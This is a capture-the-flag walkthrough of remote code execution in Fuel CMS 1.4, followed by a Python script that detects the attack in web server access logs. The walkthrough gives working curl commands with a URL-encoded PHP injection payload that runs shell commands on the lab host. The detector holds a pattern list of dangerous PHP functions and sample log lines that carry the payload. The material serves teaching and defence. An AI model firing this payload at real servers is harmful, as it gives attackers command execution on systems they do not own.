Let's boot up the machine.
Now let's start an Nmap scan.
The Nmap scan shows that ports 22 (SSH) and 80 (HTTP) are open, so let's visit the website running on port 80.
Visiting the website, we find it is running Fuel CMS (a content management system) and the page reveals its version number, so let's search exploit-db for an available exploit for Fuel CMS 1.4.
The main thing we need is the payload shown above. Let's craft a payload that runs the whoami command with the available exploit:
curl -g -s "10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27" | sed -n '47,500p' | tr ">" "\n" | grep -vE "<p|</p|h4|<div|br|</div" | awk NF | tail -n 60 | sed 's/^system$/ /g' | sort -u
To get the flag we need to replace whoami with a different command, which must be URL-encoded; CyberChef can be used to URL-encode the command.
Let's list the /home/ubuntu directory to see its contents.
Command: ls /home/ubuntu
URL-encoded: ls%20/home/ubuntu
Replace whoami with ls%20/home/ubuntu:
curl -g -s "10.10.188.18/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%20/home/ubuntu%27%29%2b%27" | sed -n '47,500p' | tr ">" "\n" | grep -vE "<p|</p|h4|<div|br|</div" | awk NF | tail -n 60 | sed 's/^system$/ /g' | sort -u
With the same steps, cat the flag file to read its contents.
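From the defender's side, the requests above leave a clear fingerprint in the web server's access log: a GET to /fuel/pages/select/ whose filter parameter, once URL-decoded, contains PHP syntax (a variable function call such as $a(...), or a command-execution function name smuggled in as a string). The following added example, written for this writeup rather than taken from the page or from Fuel CMS, parses combined-format access log lines, decodes the filter value (including double-encoded variants) and flags entries that look like this injection. The log lines embedded in SAMPLE_LOG are constructed for the example; the source addresses, timestamps and user agents are not real traffic.

```python
"""Flag Fuel CMS 'filter' parameter code-injection attempts in web access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
# Lines 1 and 3 carry the URL-encoded payload from the writeup; lines 2 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27 HTTP/1.1" 200 5123 "-" "curl/7.68.0"
10.0.0.7 - - [12/Mar/2024:10:15:09 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2024:10:16:22 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls%20/home/ubuntu%27%29%2b%27 HTTP/1.1" 200 5311 "-" "curl/7.68.0"
10.0.0.9 - - [12/Mar/2024:10:17:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: source, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators of PHP code inside what should be a plain page-name filter.
SUSPICIOUS = re.compile(
    r"\$\w+\s*\("                                                              # variable function call: $a('...')
    r"|\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("  # direct call of a dangerous function
    r"|['\"](?:system|exec|shell_exec|passthru|popen|proc_open)['\"]",          # function name smuggled as a string
    re.I,
)


def decode_filter(target):
    """Return the fully URL-decoded 'filter' value of a Fuel CMS select request, or None."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith("/fuel/pages/select"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("filter")
    if not values:
        return None
    value = values[0]  # parse_qs already applied one round of decoding
    # Decode a few more times so double-encoded payloads (%2527 -> %27 -> ') are still seen.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return one finding per request whose decoded 'filter' value looks like injected PHP."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production detector would count these
        value = decode_filter(m["target"])
        if value is None or not SUSPICIOUS.search(value):
            continue
        findings.append({"src": m["src"], "ts": m["ts"], "status": m["status"], "filter": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} status={f['status']} filter={f['filter']!r}")
```

Run against a real log with scan_log(open("/var/log/apache2/access.log").read()). A 200 status on a flagged request is the case worth escalating, since it means the injected call was executed and its output returned; the long-term fix is upgrading Fuel CMS past the vulnerable 1.4 release rather than filtering the parameter at the proxy.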
Thank you so much for reading, Happy hacking, and happy learning!!